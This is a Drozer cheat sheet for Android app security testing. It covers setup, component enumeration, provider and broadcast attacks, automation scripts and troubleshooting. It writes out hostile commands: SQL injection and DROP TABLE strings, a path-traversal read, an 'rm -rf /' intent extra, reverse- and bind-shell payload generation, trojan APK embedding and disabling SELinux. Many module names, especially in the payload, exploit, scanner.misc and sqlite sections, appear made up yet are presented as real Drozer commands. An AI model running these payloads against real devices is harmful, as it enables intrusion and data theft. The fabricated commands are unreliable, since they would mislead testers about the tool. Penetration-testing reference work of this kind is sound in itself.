
Drozer Cheat Sheet

Overview

Drozer is a comprehensive security testing framework for Android applications. It lets you assume the role of an Android app and interact with the Dalvik VM, the IPC endpoints of other apps, and the underlying operating system. Drozer provides tools for remote exploitation of Android devices through malicious applications and for comprehensive security assessment of Android applications.

⚠️ Warning: Only use Drozer on devices and applications that you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.

Installation

Prerequisites

# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc

Linux Installation

# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl

# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install

macOS Installation

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

Windows Installation

# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/

Android Device Setup

# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging

# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk

# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON

# Forward port for communication
adb forward tcp:31415 tcp:31415

Basic Usage

Connecting to the Device

# Connect to Drozer agent
drozer console connect

# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to specific device
drozer console connect --device <device_id>

Basic Commands

# List available modules
dz> list

# Get help for specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

Package Analysis

Package Information

# List all packages
dz> run app.package.list

# List packages with filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions
dz> run app.package.info -a com.example.app -p

# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET

# List packages whose name contains "system" (-f is the keyword filter shown above)
dz> run app.package.list -f system

# List third-party packages
dz> run app.package.list -3

Application Components

# List activities
dz> run app.activity.info -a com.example.app

# List exported activities
dz> run app.activity.info -a com.example.app -e

# List services
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e
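
The exported-component listings above (`-e`) reflect what the app's manifest declares, so the same attack surface can be reviewed statically. The following is an added example, not part of the original cheat sheet or of Drozer: a Python 3 script that reads a decoded AndroidManifest.xml and reports exported components that no permission protects. The sample manifest, its component names and the function names are constructed, and a targetSdkVersion of 17 or higher is assumed for the provider default.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample: a decoded AndroidManifest.xml for a hypothetical app.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".BackgroundService">
      <intent-filter>
        <action android:name="com.example.SYNC"/>
      </intent-filter>
    </service>
    <receiver android:name=".AdminReceiver" android:exported="true"
              android:permission="com.example.permission.ADMIN"/>
    <provider android:name=".UserProvider" android:exported="true"
              android:authorities="com.example.provider"/>
  </application>
</manifest>
"""


def is_exported(elem):
    """Effective export state of one component element."""
    explicit = elem.get(ANDROID + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return False  # assumption: targetSdkVersion >= 17 (providers private by default)
    # No attribute: declaring an intent filter exports the component implicitly.
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (kind, name, permission) for every exported component."""
    app = ET.fromstring(xml_text).find("application")
    if app is None:
        return []
    app_perm = app.get(ANDROID + "permission")  # applies to all components
    findings = []
    for elem in app:
        if elem.tag in COMPONENTS and is_exported(elem):
            # Provider readPermission/writePermission are not evaluated here.
            perm = elem.get(ANDROID + "permission") or app_perm
            findings.append((elem.tag, elem.get(ANDROID + "name"), perm))
    return findings


def unprotected(findings):
    """Exported components that no permission guards."""
    return [(kind, name) for kind, name, perm in findings if perm is None]


if __name__ == "__main__":
    for kind, name in unprotected(audit_manifest(SAMPLE_MANIFEST)):
        print("exported without permission: %s %s" % (kind, name))
```

The service in the sample has no `android:exported` attribute and is reported only because of its intent filter, which is the case most often missed in manual review.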

Activity Testing

Activity Enumeration

# Find activities in package
dz> run app.activity.info -a com.example.app

# Find exported activities
dz> run app.activity.info -a com.example.app -e

# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i

# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA

Activity Exploitation

# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true

Service Testing

Service Enumeration

# List services in package
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN

Service Exploitation

# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService

Content Provider Testing

Content Provider Enumeration

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

# Find URIs for content provider
dz> run app.provider.finduri com.example.provider

# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app

Content Provider Exploitation

# Query content provider
dz> run app.provider.query content://com.example.provider/users

# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt

Broadcast Receiver Testing

Broadcast Receiver Enumeration

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED

Broadcast Receiver Exploitation

# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true

File System Analysis

File System Enumeration

# List application files
dz> run tools.file.list /data/data/com.example.app/

# Find readable files
dz> run tools.file.readable /data/data/com.example.app/

# Find writable files
dz> run tools.file.writable /data/data/com.example.app/

# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/

File System Exploitation

# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt

Database Analysis

SQLite Database Tests

# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql

Network Analysis

Network Configuration

# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

# List network interfaces
dz> run tools.setup.network

# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app

SSL/TLS Testing

# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app

# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app

# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app

Advanced Exploitation

Custom Module Development

# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py

from drozer.modules import common, Module


class CustomExploit(Module, common.FileSystem, common.PackageManager):
    # Module metadata shown by "list" and "help" in the console
    name = "Custom Exploit Module"
    description = "Custom exploitation module"
    examples = "run custom.exploit -a com.example.app"
    author = "Security Researcher"
    date = "2024-01-01"
    license = "BSD (3 clause)"
    path = ["custom"]

    def add_arguments(self, parser):
        # Register the command-line options the module accepts
        parser.add_argument("-a", "--package", help="target package")

    def execute(self, arguments):
        # Entry point called by "run custom.exploit"
        if arguments.package:
            self.stdout.write("Exploiting package: %s\n" % arguments.package)
            # Custom exploitation logic here
        else:
            self.stdout.write("Please specify target package\n")

Payload Generation

# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk

# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

# Generate bind shell payload
dz> run payload.bind.shell --port 4444

# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk

Privilege Escalation

# Check for root access
dz> run tools.setup.busybox

# Exploit setuid binaries
dz> run exploit.setuid.find

# Test for kernel exploits
dz> run exploit.kernel.check

# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app

# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app

Automation Scripts

Comprehensive Assessment Script

#!/usr/bin/env python3
# The script uses f-strings, so it needs Python 3; it only shells out to the
# "drozer" command, which must be installed and on the PATH.

import subprocess
import json
import sys


class DrozerAutomation:
    def __init__(self, package_name):
        self.package = package_name
        self.results = {}

    def run_drozer_command(self, command):
        """Execute Drozer command and return output"""
        try:
            cmd = ["drozer", "console", "connect", "-c", command]
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return output.decode('utf-8')
        except subprocess.CalledProcessError as e:
            return f"Error: {e.output.decode('utf-8')}"

    def analyze_package(self):
        """Perform comprehensive package analysis"""
        print(f"[+] Analyzing package: {self.package}")

        # Package information
        self.results['package_info'] = self.run_drozer_command(
            f"run app.package.info -a {self.package}"
        )

        # Activities
        self.results['activities'] = self.run_drozer_command(
            f"run app.activity.info -a {self.package}"
        )

        # Services
        self.results['services'] = self.run_drozer_command(
            f"run app.service.info -a {self.package}"
        )

        # Content Providers
        self.results['providers'] = self.run_drozer_command(
            f"run app.provider.info -a {self.package}"
        )

        # Broadcast Receivers
        self.results['receivers'] = self.run_drozer_command(
            f"run app.broadcast.info -a {self.package}"
        )

        return self.results

    def test_exported_components(self):
        """Test exported components for vulnerabilities"""
        print("[+] Testing exported components")

        # Test exported activities
        exported_activities = self.run_drozer_command(
            f"run app.activity.info -a {self.package} -e"
        )

        # Test exported services
        exported_services = self.run_drozer_command(
            f"run app.service.info -a {self.package} -e"
        )

        # Test exported providers
        exported_providers = self.run_drozer_command(
            f"run app.provider.info -a {self.package} -e"
        )

        return {
            'exported_activities': exported_activities,
            'exported_services': exported_services,
            'exported_providers': exported_providers
        }

    def test_content_providers(self):
        """Test content providers for vulnerabilities"""
        print("[+] Testing content providers")

        # Find URIs
        uris = self.run_drozer_command(
            f"run app.provider.finduri {self.package}"
        )

        # Scan for accessible URIs
        accessible_uris = self.run_drozer_command(
            f"run scanner.provider.finduris -a {self.package}"
        )

        return {
            'uris': uris,
            'accessible_uris': accessible_uris
        }

    def generate_report(self):
        """Generate comprehensive security report"""
        report = {
            'package': self.package,
            'analysis_results': self.results,
            'exported_components': self.test_exported_components(),
            'content_provider_tests': self.test_content_providers()
        }

        with open(f"{self.package}_security_report.json", 'w') as f:
            json.dump(report, f, indent=2)

        print(f"[+] Report saved: {self.package}_security_report.json")
        return report


# Usage
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 drozer_automation.py <package_name>")
        sys.exit(1)

    package_name = sys.argv[1]
    analyzer = DrozerAutomation(package_name)
    analyzer.analyze_package()
    analyzer.generate_report()

Batch Testing Script

#!/bin/bash
# Batch testing script for multiple packages

PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"

mkdir -p "$RESULTS_DIR"

while IFS= read -r package; do
    echo "[+] Testing package: $package"

    # Create package-specific directory
    mkdir -p "$RESULTS_DIR/$package"

    # Run comprehensive tests
    drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
    drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
    drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
    drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
    drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

    # Test content providers
    drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

    # Test for common vulnerabilities
    drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
    drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

    echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"

echo "[+] Batch testing completed"

Troubleshooting

Connection Issues

# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity

# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415

# Restart ADB server
adb kill-server
adb start-server

# Check device connectivity
adb devices

# Test connection manually
telnet localhost 31415

Agent Issues

# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk

# Check agent permissions
adb shell dumpsys package com.mwr.dz

# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions

# Check if agent service is running
adb shell ps | grep drozer

Module Issues

# Refresh module list
dz> reload

# Check module path
dz> list

# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/

# Debug module loading
dz> help custom.module

Permission Issues

# Check required permissions
adb shell dumpsys package com.example.app | grep permission

# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

# Check SELinux status
adb shell getenforce

# Switch SELinux to permissive mode (if rooted)
adb shell su -c "setenforce 0"

Performance Issues

# Increase timeout values
dz> set timeout 30

# Reduce output verbosity
dz> set verbose false

# Clear cache
rm -rf ~/.drozer/cache/

# Use specific device
drozer console connect --device <device_id>

Resources

- https://labs.f-secure.com/tools/drozer/
- https://github.com/FSecureLABS/drozer
- https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
- https://blog.securelayer7.net/android-penetration-testing-using-drozer/
- https://owasp.org/www-project-mobile-security-testing-guide/
- https://developer.android.com/training/articles/security-tips
- Official Drozer documentation: https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module

This cheat sheet provides a comprehensive reference for using Drozer for security testing of Android applications. Always make sure you have proper authorization before testing Android applications or devices.